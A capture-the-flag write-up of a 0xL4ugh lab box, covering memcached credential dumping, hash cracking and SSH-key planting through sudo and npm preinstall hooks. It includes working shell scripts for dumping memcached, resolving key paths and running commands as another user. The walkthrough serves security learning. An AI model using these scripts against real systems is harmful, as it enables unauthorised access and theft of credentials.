Hey folks, today we have an amazing machine from the 0xL4ugh CTF competition.
I solved this machine with my friend Mohamed Saleh. Let's get started…
Nmap Scan
We start with a full-port nmap scan:
nmap -p- -T4 -A <ip>
Three ports are open: 22 (SSH), 80 (HTTP) and 11211 (memcached).
HTTP Enumeration
Opening the website on port 80, we found that it only serves the web server's default page.
We then ran gobuster to discover directories:
gobuster dir -u <ip> -w /path/to/wordlist
It found /robots.txt, and its content points to /note.txt.
That note contains a username and the method that was used to hash the passwords. Okay, nice.
gobuster also reported a /hidden directory.
Let's move on to the next port.
Memcached Enumeration
The third port is not one we were familiar with; it runs a service called memcached, and after searching for it we found this definition from Wikipedia.
Searching for how to attack it, we found this amazing resource.
We followed it and used the memc tools. memcached does not store files, only key/value pairs, and I found a key named SuperSecureHiddenPassword
and dumped its value, as you can see.
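memcached has no authentication at all: anyone who can reach port 11211 can list every slab, every key in each slab, and read every value. The script below is an added example (not the writeup's own commands, and not the tool from the resource the authors used) that does exactly that over the plain-text protocol with nothing but netcat and sed. The host and port are placeholders; the `stats items` and `stats cachedump` replies fed to the parsers in the usage notes are constructed samples.

```shell
#!/bin/sh
# Added example: enumerate and dump every key in an unauthenticated memcached
# instance using only its text protocol. Assumes `nc` (netcat) is installed;
# the target host/port are hypothetical.

# Send one memcached command and print the reply. The trailing `quit` makes
# the server close the connection; -w 2 stops nc hanging if it never does.
memc_cmd() {
    host=$1; port=$2; cmd=$3
    printf '%s\r\nquit\r\n' "$cmd" | nc -w 2 "$host" "$port"
}

# Parse `stats items` output and print the slab ids that hold items,
# e.g. "STAT items:1:number 3" -> "1".
memc_slab_ids() {
    sed -n 's/^STAT items:\([0-9]*\):number .*/\1/p' | sort -un
}

# Parse `stats cachedump <slab> <limit>` output and print the key names,
# e.g. "ITEM SuperSecureHiddenPassword [32 b; 0 s]" -> "SuperSecureHiddenPassword".
memc_keys() {
    sed -n 's/^ITEM \([^ ]*\) \[.*/\1/p'
}

# Walk every slab, list its keys, and fetch each value with `get`.
# Usage: memc_dump_all <ip> 11211
memc_dump_all() {
    host=$1; port=$2
    for slab in $(memc_cmd "$host" "$port" 'stats items' | memc_slab_ids); do
        # a limit of 0 asks for every key in the slab
        for key in $(memc_cmd "$host" "$port" "stats cachedump $slab 0" | memc_keys); do
            printf '== %s ==\n' "$key"
            memc_cmd "$host" "$port" "get $key"
        done
    done
}
```

On newer memcached builds `stats cachedump` is deprecated and may truncate long key lists; `lru_crawler metadump all` returns every key (as `key=...` lines) and can be parsed the same way. The fix on the defending side is the same in both cases: bind memcached to localhost or a private interface and firewall 11211, because the protocol itself offers no authentication.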
We tried to crack it with hashcat/john using the rockyou.txt wordlist,
but it was going to take a long time with no results, so we searched for the hashing method mentioned in /note.txt
and discovered this amazing resource.
We built our own wordlist from it and used it with john
to crack the hash, and it worked.
The password is wertyuytyu,
and we also have the username from the note.
We can log in with the credentials phoenix : wertyuytyu
There are three users on the box and a file that does not contain anything useful.
Let's try to escalate our privileges.
I found that I can execute a command as the user jett
without being asked for a password.
We tried to copy our SSH public key (id_rsa.pub, not the private id_rsa)
into /home/jett/.ssh/authorized_keys,
but it failed.
After checking the SSH server's config file (sshd_config) we found the reason in this line:
the file that should contain the RSA public key is called UsePAM,
i.e. AuthorizedKeysFile is set to UsePAM instead of the default .ssh/authorized_keys.
So we copied our public key
to /home/jett/UsePAM
and then connected to the server with our private key.
It works ❤
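The lesson from this step is to read sshd_config instead of assuming `~/.ssh/authorized_keys`: sshd takes the first `AuthorizedKeysFile` line it finds, the line may list several files, each entry may be absolute or relative to the user's home, and `%h` / `%u` expand to the home directory and user name. The helper below is an added example (not part of the original writeup) that resolves those paths for a given user; the config file, user and home directory passed in the usage notes are constructed for illustration.

```shell
#!/bin/sh
# Added example: work out where sshd actually reads public keys from for a
# user, following sshd_config's AuthorizedKeysFile rules:
#   - the first matching directive wins (keyword is case-insensitive)
#   - several files may be listed, separated by spaces
#   - %h = user's home, %u = user name, %% = literal %
#   - relative paths are relative to the user's home directory

# Print one resolved path per line.
# $1 = path to sshd_config, $2 = user name, $3 = that user's home directory
resolve_authorized_keys() {
    cfg=$1; user=$2; home=$3
    # first uncommented AuthorizedKeysFile line
    line=$(grep -i '^[[:space:]]*AuthorizedKeysFile[[:space:]]' "$cfg" | head -n 1)
    # sshd's compiled-in default when the directive is absent
    [ -n "$line" ] || line='AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2'
    set -- $line; shift              # drop the keyword, keep the file list
    for entry in "$@"; do
        p=$(printf '%s' "$entry" | sed -e "s|%h|$home|g" -e "s|%u|$user|g" -e 's|%%|%|g')
        case $p in
            /*) printf '%s\n' "$p" ;;
            *)  printf '%s/%s\n' "$home" "$p" ;;
        esac
    done
}

# Usage on the target, e.g.:
#   resolve_authorized_keys /etc/ssh/sshd_config jett /home/jett
# prints /home/jett/UsePAM for this box, which is where the public key must go.
```

Two caveats when planting the key: the path must be writable by the command sudo lets you run as the target user, and with the default `StrictModes yes` sshd silently ignores a keys file that is group- or world-writable or not owned by the user (or root), so `chmod 600` the file after copying it.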
With the same method we can execute a command as brimstorm.
That command is npm,
and after searching for what npm is
and how it can be dangerous, we found this repo.
We will escalate the same way: drop our public key
into brimstorm's home directory (sshd reads the same UsePAM file name there).
We downloaded the files from the repo, edited the evil command, and ran it as brimstorm.
Let's try to log in using ssh.
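Why is `sudo -u brimstorm npm` dangerous? npm runs the lifecycle scripts declared in package.json (`preinstall`, `postinstall`, ...) as the user invoking npm, so a package.json under our control turns `npm install` into arbitrary command execution as that user. The script below is an added example of that technique; it is not the writeup's own code nor the repo the authors downloaded. The user name brimstorm, the key path /home/brimstorm/UsePAM (matching the sshd_config on this box) and the /tmp/attacker.pub path are assumptions for illustration.

```shell
#!/bin/sh
# Added example: run a command as another user through `sudo -u <user> npm`
# by putting it in a package.json "preinstall" script. npm executes that
# script as the invoking user when `npm install` is run in the directory.

# Write a package.json in directory $1 whose preinstall hook runs $2.
# $2 must not contain double quotes or backslashes (no JSON escaping here).
# Prints the path of the generated file.
make_npm_payload() {
    dir=$1; cmd=$2
    mkdir -p "$dir"
    printf '{"name": "x", "version": "1.0.0", "scripts": {"preinstall": "%s"}}\n' "$cmd" > "$dir/package.json"
    printf '%s/package.json\n' "$dir"
}

# Run `npm install` on directory $2 as user $1 via sudo.
# -C makes npm treat $2 as its working directory, so its package.json is used.
npm_run_as() {
    user=$1; dir=$2
    sudo -u "$user" npm -C "$dir" install
}

# Plant our SSH public key ($2) where sshd on this box reads keys from,
# i.e. <home>/UsePAM, and make it acceptable to StrictModes.
# Usage: plant_key_via_npm brimstorm /tmp/attacker.pub
plant_key_via_npm() {
    user=$1; pub=$2
    work=$(mktemp -d)
    make_npm_payload "$work" "cp $pub /home/$user/UsePAM && chmod 600 /home/$user/UsePAM" > /dev/null
    npm_run_as "$user" "$work"
}
```

Whether this works depends on the exact sudo rule: if it restricts npm's arguments, the directory change has to happen some other way (for example running the command from inside the payload directory, if that is permitted). After the install finishes, `ssh -i ~/.ssh/id_rsa brimstorm@<ip>` should log in without a password.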
At first I tried to decode this string and failed; after asking the support team, they told me that the string itself is the flag. It was a trick :(